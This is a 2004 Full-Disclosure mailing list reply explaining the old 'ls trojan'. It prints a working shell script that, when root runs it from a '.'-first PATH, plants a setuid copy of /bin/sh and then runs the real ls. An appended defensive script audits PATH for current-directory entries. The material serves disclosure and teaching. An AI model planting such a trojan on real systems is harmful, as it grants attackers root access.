Re: [Full-Disclosure] Old LS Trojan?
From: Andrew Farmer (andfarm teknovis.com)
Date: Wed Dec 01 2004 - 16:27:40 CST
On 01 Dec 2004, at 12:11, David S. Morgan wrote:
> I am looking for an old LS trojan, with trojan being a misnomer.
> Essentially, the scenario is that the admin (root) has a . (dot) in
> his path. The bad-user knows this, and has crafted an LS shell script
> (the part that I can't find) that essentially copies /sbin/sh to a
> hidden directory and then performs some suid majik to make the sh run
> as if they were root, without needing the root password. The file
> then removes itself and does the real version of ls.
>
> Does anyone remember this one, and have the ls script anywhere? I
> would like to use it in a demonstration. I know that this has
> probably been fixed in various ways, but I have "old Unixes" for just
> such occasions.
Probably something along the lines of:
> #!/bin/bash
> [ `whoami` = root ] || exit
> cp /bin/sh /bin/suid-sh
> chmod +s /bin/suid-sh
> rm $0
> exec /bin/ls $*
Note that this would only run if your $PATH _begins_ with '.' - if
you're going to put '.' in your $PATH, put it _last_.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
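
A check for the precondition discussed in this thread, as an added example that is not part of either poster's message: the hypothetical `audit_path` function reports every `$PATH` entry that resolves against the current directory and whether it is searched before or after the directory holding the real command. The `SHADOW` and `FALLBACK` labels are this example's own.

```shell
#!/bin/sh
# Added example (not from the thread): audit a PATH string for entries that
# resolve against the current working directory.
#
# audit_path PATH_STRING [COMMAND]
#   SHADOW   = entry is searched before any directory that holds COMMAND
#   FALLBACK = entry is searched after the real COMMAND; it still answers
#              for any name not found earlier (typos, uninstalled tools)
# Prints nothing for a clean PATH. The ( ) body keeps variables local.
audit_path() (
    path_string=$1
    cmd=${2:-ls}
    rest="${path_string}:"   # sentinel ':' so a trailing empty entry survives
    pos=0
    real_dir=""

    while [ -n "$rest" ]; do
        entry=${rest%%:*}    # text up to the first ':'
        rest=${rest#*:}      # drop that entry and its ':'
        pos=$((pos + 1))
        case $entry in
            '') why="empty entry, treated as the current directory" ;;
            .)  why="current directory" ;;
            /*) # Absolute entry: note the first one that really holds $cmd.
                if [ -z "$real_dir" ] && [ -f "$entry/$cmd" ] && [ -x "$entry/$cmd" ]; then
                    real_dir=$entry
                fi
                continue ;;
            *)  why="relative entry, resolved against the current directory" ;;
        esac
        if [ -z "$real_dir" ]; then
            printf "SHADOW   pos=%s entry='%s' (%s): a file named %s there runs first\n" \
                "$pos" "$entry" "$why" "$cmd"
        else
            printf "FALLBACK pos=%s entry='%s' (%s): %s/%s is found first\n" \
                "$pos" "$entry" "$why" "$real_dir" "$cmd"
        fi
    done
)

# Audit the invoking user's PATH (run this from root's login shell as well).
audit_path "$PATH" ls
```

A leading or trailing `:` and a doubled `::` are reported as empty entries, since the shell searches the current directory for those just as it does for `.`.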